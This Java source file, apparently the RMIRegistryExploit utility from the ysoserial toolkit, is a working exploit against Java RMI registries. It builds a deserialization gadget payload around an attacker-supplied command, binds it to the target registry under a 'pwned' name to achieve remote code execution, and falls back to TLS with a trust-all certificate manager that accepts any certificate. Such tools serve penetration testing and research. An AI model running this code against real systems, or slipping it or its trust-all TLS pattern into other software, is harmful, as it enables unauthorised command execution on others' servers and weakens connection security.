package ysoserial.exploit;

import java.io.IOException;
import java.net.Socket;
import java.rmi.ConnectIOException;
import java.rmi.Remote;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import java.rmi.server.RMIClientSocketFactory;
import java.security.cert.X509Certificate;
import java.util.concurrent.Callable;
import javax.net.ssl.*;

import ysoserial.payloads.CommonsCollections1;
import ysoserial.payloads.ObjectPayload;
import ysoserial.payloads.ObjectPayload.Utils;
import ysoserial.payloads.util.Gadgets;
import ysoserial.secmgr.ExecCheckingSecurityManager;

/*
 * Utility program for exploiting RMI registries running with required gadgets available in their ClassLoader.
 * Attempts to exploit the registry itself, then enumerates registered endpoints and their interfaces.
 *
 * TODO: automatic exploitation of endpoints, potentially with automated download and use of jars containing remote
 * interfaces. See http://www.findmaven.net/api/find/class/org.springframework.remoting.rmi.RmiInvocationHandler .
 */
@SuppressWarnings({"rawtypes", "unchecked"})
public class RMIRegistryExploit {
	private static class TrustAllSSL implements X509TrustManager {
		private static final X509Certificate[] ANY_CA = {};
		public X509Certificate[] getAcceptedIssuers() { return ANY_CA; }
		public void checkServerTrusted(final X509Certificate[] c, final String t) { /* Do nothing/accept all */ }
		public void checkClientTrusted(final X509Certificate[] c, final String t) { /* Do nothing/accept all */ }
	}

	private static class RMISSLClientSocketFactory implements RMIClientSocketFactory {
		public Socket createSocket(String host, int port) throws IOException {
			try {
				SSLContext ctx = SSLContext.getInstance("TLS");
				ctx.init(null, new TrustManager[] {new TrustAllSSL()}, null);
				SSLSocketFactory factory = ctx.getSocketFactory();
				return factory.createSocket(host, port);
			} catch(Exception e) {
				throw new IOException(e);
			}
		}
	}

	public static void main(final String[] args) throws Exception {
		final String host = args[0];
		final int port = Integer.parseInt(args[1]);
		final String command = args[3];
		Registry registry = LocateRegistry.getRegistry(host, port);
		final String className = CommonsCollections1.class.getPackage().getName() +  "." + args[2];
		final Class<? extends ObjectPayload> payloadClass = (Class<? extends ObjectPayload>) Class.forName(className);

		// test RMI registry connection and upgrade to SSL connection on fail
		try {
			registry.list();
		} catch(ConnectIOException ex) {
			registry = LocateRegistry.getRegistry(host, port, new RMISSLClientSocketFactory());
		}

		// ensure payload doesn't detonate during construction or deserialization
		exploit(registry, payloadClass, command);
	}

	public static void exploit(final Registry registry,
			final Class<? extends ObjectPayload> payloadClass,
			final String command) throws Exception {
		new ExecCheckingSecurityManager().callWrapped(new Callable<Void>(){public Void call() throws Exception {
			ObjectPayload payloadObj = payloadClass.newInstance();
            Object payload = payloadObj.getObject(command);
			String name = "pwned" + System.nanoTime();
			Remote remote = Gadgets.createMemoitizedProxy(Gadgets.createMap(name, payload), Remote.class);
			try {
				registry.bind(name, remote);
			} catch (Throwable e) {
				e.printStackTrace();
			}
			Utils.releasePayload(payloadObj, payload);
			return null;
		}});
	}
}